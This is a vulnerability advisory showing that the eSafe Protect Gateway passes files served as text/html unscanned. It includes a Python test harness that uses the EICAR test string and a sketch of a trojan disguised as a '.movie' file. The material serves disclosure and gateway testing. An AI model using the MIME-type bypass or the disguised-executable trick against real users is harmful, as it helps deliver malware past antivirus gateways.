COMMAND
Esafe Protect Gateway (CVP)
SYSTEMS AFFECTED
Esafe Protect Gateway (CVP) v2.1 build 98
PROBLEM
Hugo van der Kooij found the following. The Esafe Protect Gateway
(ESPG) does not scan some files when deployed as a CVP server for
FireWall-1.
If you want the Esafe Protect Gateway to scan all content for the
presence of a virus, you have two options.
1. Choose to scan anything not listed in the 'safe file types'
list, and then clear all entries from that list.
2. Choose to scan only files listed in the 'dangerous file
types' list, and then have only one extension listed in it,
namely '*'.
Deciding to rely on extensions is already an indication of a flawed
design. Renaming files is common practice and can be done by anyone
capable of operating a keyboard.
The actual problem is that anything with the MIME type set to
TEXT/HTML will not be scanned, regardless of which of the options
recommended above is chosen. A simple test demonstrates this.
Set up a default Apache server. Copy a virus file to two locations,
http://website/test1.txt and http://website/test1.html, and try to
download them with your favorite browser. Use URLs your browser has
never fetched before, to minimize the chance that a cached copy is
served; a forced reload also works and is sufficient if you want to
replicate this issue. Downloading http://website/test1.html does
nothing to detect the virus and the file is yours: no protection is
offered. Downloading http://website/test1.txt will not work, as ESPG
now intercepts the file containing the virus.
By adjusting the web server to send *.txt with MIME type TEXT/HTML
and *.html with MIME type TEXT/PLAIN, you can then test with
http://website/test2.txt and http://website/test2.html to verify
this. Downloading http://website/test2.txt will get you infected, as
ESPG does not scan the file, while downloading
http://website/test2.html will not work, as ESPG detects the virus
and prevents the download. The decision is made on the Content-Type
header the web server sends, not on the file name.
This was tested with Esafe Protect Gateway v2.1 build 98, virus
tables dated March 15, 2000.
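As an added, stand-alone example (not part of the original advisory, and not material from eSafe or from Mr. van der Kooij), the following Python script reproduces both rounds of the test above without Apache: a small HTTP server serves one body under the four paths with exactly the Content-Type mapping described, and a probe function reports whether the unmodified body reached the client. The EICAR test string stands in for the virus file (an assumption; any file the gateway's scanner detects will do), and the host, port and path names are this example's own.

```python
import http.server
import threading
import urllib.error
import urllib.request

# EICAR standard anti-virus test string (stand-in for the advisory's
# virus file). Assembled from two halves so that this source file does
# not itself match the signature; only the served HTTP body does.
EICAR = "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR" + "-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Mirrors the advisory's two rounds: test1.* uses Apache's default MIME
# mapping, test2.* has that mapping inverted. The server, not the file
# name, decides which Content-Type the gateway sees.
PATH_TO_MIME = {
    "/test1.txt": "text/plain",
    "/test1.html": "text/html",
    "/test2.txt": "text/html",
    "/test2.html": "text/plain",
}


class MimeProbeHandler(http.server.BaseHTTPRequestHandler):
    payload = EICAR.encode()
    mime_map = PATH_TO_MIME

    def do_GET(self):
        ctype = self.mime_map.get(self.path)
        if ctype is None:
            self.send_error(404)
            return
        self.send_response(200)
        self.send_header("Content-Type", ctype)
        self.send_header("Content-Length", str(len(self.payload)))
        self.send_header("Cache-Control", "no-store")  # defeat caches between client and server
        self.end_headers()
        self.wfile.write(self.payload)

    def log_message(self, *args):  # keep the probe run quiet
        pass


def start_probe_server(host="127.0.0.1", port=0):
    """Start the server on a background thread; returns (server, base_url).

    For a real gateway test, run this on the web-server side of the
    gateway (e.g. host="0.0.0.0", port=80) and call probe() from a client
    on the protected side with proxy= pointing at the gateway.
    """
    srv = http.server.ThreadingHTTPServer((host, port), MimeProbeHandler)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, "http://%s:%d" % (host, srv.server_address[1])


def probe(base_url, path, proxy=None, timeout=5):
    """Fetch one path, optionally through a scanning proxy or gateway.

    Returns the HTTP status, the Content-Type as delivered, and whether
    the unmodified test body reached the client ('delivered'). A gateway
    that really scans this MIME type must leave delivered == False
    (block page, error status or dropped connection).
    """
    handlers = [urllib.request.ProxyHandler({"http": proxy})] if proxy else []
    opener = urllib.request.build_opener(*handlers)
    try:
        with opener.open(base_url + path, timeout=timeout) as resp:
            body = resp.read()
            return {"status": resp.status,
                    "content_type": resp.headers.get("Content-Type"),
                    "delivered": body == MimeProbeHandler.payload}
    except urllib.error.HTTPError as e:
        return {"status": e.code, "content_type": e.headers.get("Content-Type"),
                "delivered": False}
    except (urllib.error.URLError, OSError) as e:
        return {"status": None, "content_type": None, "delivered": False,
                "error": str(e)}


def run_probes(base_url, proxy=None):
    """Probe every path; returns {path: (mime_sent, delivered)}."""
    return {p: (m, probe(base_url, p, proxy)["delivered"]) for p, m in PATH_TO_MIME.items()}


if __name__ == "__main__":
    # Self-check with no gateway in the path: every body must be delivered.
    server, url = start_probe_server()
    for path, (mime, delivered) in run_probes(url).items():
        print("%-12s served as %-10s -> %s" % (path, mime,
              "delivered (not blocked)" if delivered else "blocked"))
    server.shutdown()
```

Run without a proxy first to confirm the harness itself delivers all four bodies; then repeat from a client behind the gateway. A result pattern in which both paths served as text/html are delivered while both served as text/plain are blocked reproduces the advisory's finding, independent of extension. With Apache, the equivalent inversion of the second round is `AddType text/html .txt` and `AddType text/plain .html` in the server configuration.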
A simple scenario. Provide a supposed link to a .movie file for
download which is actually an executable with an embedded .avi (it
could be any nonstandard, non-executable file type; .movie just works
well). The web server presents this with MIME type
video/x-sgi-movie. The user saves it to disk and follows the brief
instruction for playing it, doing Start/Run "start [download
path]\test.movie". The trojaned file looks like a movie playing and
exits, but has delivered its payload in the interim. Demo:
- copy notepad.exe to %TEMP%\test.movie
- do a start/run
- type in "start [tmpdir]\test.movie"
- you now have notepad up on the screen.
The lab tests performed proved that any file using the MIME header
TEXT/HTML is passed without verification, regardless of the
extension. Using another vendor's CVP server, testers were able to
verify that the issue is not a FireWall-1 problem but one of the
ESPG CVP server itself: Trend Micro's CVP server did find the virus
under both the TEXT/PLAIN and the TEXT/HTML MIME type.
SOLUTION
The trade-off between performance and sufficiency of protection is a
well-known issue in the world of data security. As Mr. van der Kooij
suggested, it is possible to make files pass through eSafe Gateway
without being scanned for viruses, thus creating security holes.
eSafe believes that relying on file extensions in order to avoid
threats and virus attacks is highly efficient, and that this is
definitely not due to a "flawed design". At eSafe, they believe that
it is possible to achieve a high level of security and privacy while
relying on file extensions.
According to Esafe, the subject described above is not a bug, nor a
security problem; hence, no fix is needed. On the other hand, the
Dutch office informed Hugo van der Kooij that the issue is now known
by the ID DR/047 and is being handled by the development crew.
At present, Esafe Protect Gateway cannot be trusted to protect you
from downloading a virus. Since the bypass depends only on the
Content-Type header sent by the web server, which is under the
attacker's control, neither of the extension-based configuration
options above offers any mitigation.